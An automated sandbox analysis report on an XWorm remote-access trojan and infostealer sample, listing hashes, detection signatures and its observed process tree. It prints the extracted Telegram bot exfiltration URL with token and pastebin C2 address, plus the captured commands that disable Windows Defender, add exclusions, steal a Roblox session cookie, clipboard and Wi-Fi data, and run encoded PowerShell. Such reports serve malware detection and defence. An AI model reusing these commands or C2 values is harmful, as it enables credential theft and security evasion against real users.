xworm | 5e455f6e81774b115d394ccf62b51afe52ecf0504a394ba9c5146550117f0acc

Analysis

max time kernel
91s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03-02-2024 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

img_logger.exe
Size

11.3MB
MD5

be7953da970075c28dd1ae0f9a3ec54e
SHA1

e148a3fafdfc6dd39a7ecb764f96ad5b1d9f37ed
SHA256

5e455f6e81774b115d394ccf62b51afe52ecf0504a394ba9c5146550117f0acc
SHA512

92e4cf931f3e3e38b8504c62ec7c20fac9529ff1b345440839cdbdb7eb3558820d72da9350230e63643116d7e6d7528f8e831dfae99558572b92db459441a358
SSDEEP

196608:kjl3eZiqD2QrMTJfEQA42TtqdTX+FsI8pIkEsY6f2mWZZOIA6XvuXvzIyxRP:kZDqvUJfEQh2hqFX+mIdJsnZGPWXvzI0

Score

10^/10

xworm rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

https://pastebin.com/raw/iTFsRfJn:180508

Attributes

Install_directory
%ProgramData%
install_file
msedge.exe
pastebin_url
https://pastebin.com/raw/iTFsRfJn
telegram
https://api.telegram.org/bot6360505249:AAHDdvMVsfbwHsuJFlpL2LbAMh0zDVhDNu0/sendMessage?chat_id=6056246212

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e00000002314b-6.dat	family_xworm
behavioral1/memory/2296-13-0x0000000000190000-0x00000000001C6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	imgLog.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	img_logger.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	mObf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	msedge.exe

Executes dropped EXE 6 IoCs

pid	Process
2296	msedge.exe
216	imgLog.exe
3860	imgLog.exe
4716	mObf.exe
2920	WMIC.exe
2024	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe
3860	imgLog.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023241-104.dat	upx
behavioral1/memory/3860-111-0x00007FF91DB20000-0x00007FF91E109000-memory.dmp	upx
behavioral1/files/0x000600000002323f-116.dat	upx
behavioral1/files/0x0006000000023245-162.dat	upx
behavioral1/files/0x0006000000023244-161.dat	upx
behavioral1/memory/3860-164-0x00007FF939E90000-0x00007FF939E9F000-memory.dmp	upx
behavioral1/memory/3860-163-0x00007FF935510000-0x00007FF935533000-memory.dmp	upx
behavioral1/files/0x0006000000023240-158.dat	upx
behavioral1/files/0x000600000002323e-157.dat	upx
behavioral1/memory/3860-180-0x00007FF930FA0000-0x00007FF930FCD000-memory.dmp	upx
behavioral1/memory/3860-182-0x00007FF930CF0000-0x00007FF930D13000-memory.dmp	upx
behavioral1/memory/3860-181-0x00007FF930D20000-0x00007FF930D39000-memory.dmp	upx
behavioral1/memory/3860-183-0x00007FF91D530000-0x00007FF91D6A7000-memory.dmp	upx
behavioral1/memory/3860-185-0x00007FF930B40000-0x00007FF930B59000-memory.dmp	upx
behavioral1/memory/3860-187-0x00007FF91D990000-0x00007FF91DA5D000-memory.dmp	upx
behavioral1/memory/3860-186-0x00007FF9305D0000-0x00007FF930603000-memory.dmp	upx
behavioral1/memory/3860-184-0x00007FF930B30000-0x00007FF930B3D000-memory.dmp	upx
behavioral1/memory/3860-189-0x00007FF9307E0000-0x00007FF9307ED000-memory.dmp	upx
behavioral1/memory/3860-193-0x00007FF91CC10000-0x00007FF91D130000-memory.dmp	upx
behavioral1/memory/3860-194-0x00007FF931320000-0x00007FF931334000-memory.dmp	upx
behavioral1/memory/3860-195-0x00007FF91D870000-0x00007FF91D98C000-memory.dmp	upx
behavioral1/memory/3860-196-0x00007FF91DB20000-0x00007FF91E109000-memory.dmp	upx
behavioral1/memory/3860-200-0x00007FF935510000-0x00007FF935533000-memory.dmp	upx
behavioral1/files/0x00070000000231fc-114.dat	upx
behavioral1/memory/3860-279-0x00007FF930CF0000-0x00007FF930D13000-memory.dmp	upx
behavioral1/memory/3860-289-0x00007FF91D530000-0x00007FF91D6A7000-memory.dmp	upx
behavioral1/memory/3860-357-0x00007FF9305D0000-0x00007FF930603000-memory.dmp	upx
behavioral1/memory/3860-359-0x00007FF930B40000-0x00007FF930B59000-memory.dmp	upx
behavioral1/memory/3860-361-0x00007FF91D990000-0x00007FF91DA5D000-memory.dmp	upx
behavioral1/memory/3860-470-0x00007FF935510000-0x00007FF935533000-memory.dmp	upx
behavioral1/memory/3860-475-0x00007FF91D530000-0x00007FF91D6A7000-memory.dmp	upx
behavioral1/memory/3860-469-0x00007FF91DB20000-0x00007FF91E109000-memory.dmp	upx
behavioral1/memory/3860-484-0x00007FF91DB20000-0x00007FF91E109000-memory.dmp	upx
behavioral1/memory/3860-494-0x00007FF91D990000-0x00007FF91DA5D000-memory.dmp	upx
behavioral1/memory/3860-495-0x00007FF91CC10000-0x00007FF91D130000-memory.dmp	upx
behavioral1/memory/3860-498-0x00007FF91D870000-0x00007FF91D98C000-memory.dmp	upx
behavioral1/memory/3860-497-0x00007FF9307E0000-0x00007FF9307ED000-memory.dmp	upx
behavioral1/memory/3860-496-0x00007FF931320000-0x00007FF931334000-memory.dmp	upx
behavioral1/memory/3860-493-0x00007FF9305D0000-0x00007FF930603000-memory.dmp	upx
behavioral1/memory/3860-492-0x00007FF930B30000-0x00007FF930B3D000-memory.dmp	upx
behavioral1/memory/3860-491-0x00007FF930B40000-0x00007FF930B59000-memory.dmp	upx
behavioral1/memory/3860-490-0x00007FF91D530000-0x00007FF91D6A7000-memory.dmp	upx
behavioral1/memory/3860-489-0x00007FF930CF0000-0x00007FF930D13000-memory.dmp	upx
behavioral1/memory/3860-488-0x00007FF930D20000-0x00007FF930D39000-memory.dmp	upx
behavioral1/memory/3860-487-0x00007FF930FA0000-0x00007FF930FCD000-memory.dmp	upx
behavioral1/memory/3860-486-0x00007FF939E90000-0x00007FF939E9F000-memory.dmp	upx
behavioral1/memory/3860-485-0x00007FF935510000-0x00007FF935533000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4312	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
4720	tasklist.exe
3692	tasklist.exe
456	tasklist.exe
1524	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3524	systeminfo.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
320	taskkill.exe
4452	taskkill.exe
4584	taskkill.exe
1232	taskkill.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
2452	powershell.exe
3768	powershell.exe
3768	powershell.exe
2452	powershell.exe
2452	powershell.exe
1892	powershell.exe
1892	powershell.exe
3768	powershell.exe
3768	powershell.exe
1892	powershell.exe
3856	powershell.exe
3856	powershell.exe
2396	powershell.exe
2396	powershell.exe
3280	powershell.exe
3280	powershell.exe
2396	powershell.exe
3856	powershell.exe
3280	powershell.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
2428	powershell.exe
2428	powershell.exe
1524	powershell.exe
1524	powershell.exe
3468	powershell.exe
3468	powershell.exe
3056	powershell.exe
3056	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2296	msedge.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	4720	tasklist.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	3692	tasklist.exe
Token: SeDebugPrivilege	456	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	1232	taskkill.exe
Token: SeDebugPrivilege	320	WMIC.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeIncreaseQuotaPrivilege	320	WMIC.exe
Token: SeSecurityPrivilege	320	WMIC.exe
Token: SeTakeOwnershipPrivilege	320	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 860 wrote to memory of 2296	860	img_logger.exe	85
PID 860 wrote to memory of 2296	860	img_logger.exe	85
PID 860 wrote to memory of 216	860	img_logger.exe	86
PID 860 wrote to memory of 216	860	img_logger.exe	86
PID 216 wrote to memory of 3860	216	imgLog.exe	131
PID 216 wrote to memory of 3860	216	imgLog.exe	131
PID 860 wrote to memory of 4716	860	img_logger.exe	87
PID 860 wrote to memory of 4716	860	img_logger.exe	87
PID 4716 wrote to memory of 2920	4716	mObf.exe	195
PID 4716 wrote to memory of 2920	4716	mObf.exe	195
PID 3860 wrote to memory of 2728	3860	imgLog.exe	96
PID 3860 wrote to memory of 2728	3860	imgLog.exe	96
PID 3860 wrote to memory of 3576	3860	imgLog.exe	93
PID 3860 wrote to memory of 3576	3860	imgLog.exe	93
PID 3860 wrote to memory of 4832	3860	imgLog.exe	89
PID 3860 wrote to memory of 4832	3860	imgLog.exe	89
PID 3576 wrote to memory of 3768	3576	cmd.exe	95
PID 3576 wrote to memory of 3768	3576	cmd.exe	95
PID 4832 wrote to memory of 2452	4832	cmd.exe	94
PID 4832 wrote to memory of 2452	4832	cmd.exe	94
PID 3860 wrote to memory of 1664	3860	imgLog.exe	98
PID 3860 wrote to memory of 1664	3860	imgLog.exe	98
PID 3860 wrote to memory of 3336	3860	imgLog.exe	173
PID 3860 wrote to memory of 3336	3860	imgLog.exe	173
PID 3860 wrote to memory of 1228	3860	imgLog.exe	119
PID 3860 wrote to memory of 1228	3860	imgLog.exe	119
PID 3860 wrote to memory of 3332	3860	imgLog.exe	102
PID 3860 wrote to memory of 3332	3860	imgLog.exe	102
PID 3860 wrote to memory of 4812	3860	imgLog.exe	101
PID 3860 wrote to memory of 4812	3860	imgLog.exe	101
PID 3860 wrote to memory of 4112	3860	imgLog.exe	104
PID 3860 wrote to memory of 4112	3860	imgLog.exe	104
PID 3860 wrote to memory of 1872	3860	imgLog.exe	117
PID 3860 wrote to memory of 1872	3860	imgLog.exe	117
PID 3860 wrote to memory of 3724	3860	imgLog.exe	116
PID 3860 wrote to memory of 3724	3860	imgLog.exe	116
PID 3860 wrote to memory of 4692	3860	imgLog.exe	111
PID 3860 wrote to memory of 4692	3860	imgLog.exe	111
PID 3860 wrote to memory of 3676	3860	imgLog.exe	110
PID 3860 wrote to memory of 3676	3860	imgLog.exe	110
PID 2728 wrote to memory of 1892	2728	cmd.exe	106
PID 2728 wrote to memory of 1892	2728	cmd.exe	106
PID 3336 wrote to memory of 4720	3336	getmac.exe	107
PID 3336 wrote to memory of 4720	3336	getmac.exe	107
PID 1664 wrote to memory of 3692	1664	cmd.exe	112
PID 1664 wrote to memory of 3692	1664	cmd.exe	112
PID 3332 wrote to memory of 456	3332	cmd.exe	120
PID 3332 wrote to memory of 456	3332	cmd.exe	120
PID 1228 wrote to memory of 2220	1228	cmd.exe	122
PID 1228 wrote to memory of 2220	1228	cmd.exe	122
PID 4692 wrote to memory of 3568	4692	cmd.exe	205
PID 4692 wrote to memory of 3568	4692	cmd.exe	205
PID 1872 wrote to memory of 2500	1872	cmd.exe	130
PID 1872 wrote to memory of 2500	1872	cmd.exe	130
PID 4112 wrote to memory of 628	4112	cmd.exe	125
PID 4112 wrote to memory of 628	4112	cmd.exe	125
PID 3724 wrote to memory of 3524	3724	cmd.exe	124
PID 3724 wrote to memory of 3524	3724	cmd.exe	124
PID 2296 wrote to memory of 3280	2296	msedge.exe	123
PID 2296 wrote to memory of 3280	2296	msedge.exe	123
PID 4812 wrote to memory of 3856	4812	cmd.exe	128
PID 4812 wrote to memory of 3856	4812	cmd.exe	128
PID 3676 wrote to memory of 2396	3676	cmd.exe	126
PID 3676 wrote to memory of 2396	3676	cmd.exe	126

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4824	attrib.exe
3972	attrib.exe

C:\Users\Admin\AppData\Local\Temp\img_logger.exe
"C:\Users\Admin\AppData\Local\Temp\img_logger.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:860
- C:\ProgramData\msedge.exe
  "C:\ProgramData\msedge.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\msedge.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\msedge.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- C:\ProgramData\imgLog.exe
  "C:\ProgramData\imgLog.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\ProgramData\imgLog.exe
    "C:\ProgramData\imgLog.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:1232
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2688
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:636
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5096
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1296
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2792
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4636
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2296"
      4⤵
      PID:3368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2296
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2296"
      4⤵
      PID:5008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2296
        5⤵
        Kills process with taskkill
        
        PID:320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:2208
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI2162\rar.exe a -r -hp"dark123" "C:\Users\Admin\AppData\Local\Temp\vKIla.zip" *"
      4⤵
      PID:4460
    - - C:\Users\Admin\AppData\Local\Temp\_MEI2162\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI2162\rar.exe a -r -hp"dark123" "C:\Users\Admin\AppData\Local\Temp\vKIla.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2920"
      4⤵
      PID:2664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2920"
      4⤵
      PID:908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2848
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        Executes dropped EXE
        
        PID:2920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3572
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4620
- C:\ProgramData\mObf.exe
  "C:\ProgramData\mObf.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Users\Admin\AppData\Roaming\msedge.exe
    "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎‎.scr'"
1⤵
- Suspicious use of WriteProcessMemory
PID:4832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎‎.scr'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
1⤵
- Suspicious use of WriteProcessMemory
PID:3576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\imgLog.exe'"
1⤵
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\imgLog.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
1⤵
PID:3336
- C:\Windows\system32\tasklist.exe
  tasklist /FO LIST
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\system32\tasklist.exe
  tasklist /FO LIST
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
1⤵
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Get-Clipboard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
1⤵
- Suspicious use of WriteProcessMemory
PID:3332
- C:\Windows\system32\tasklist.exe
  tasklist /FO LIST
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
1⤵
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Windows\system32\netsh.exe
  netsh wlan show profile
  2⤵
  PID:628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAA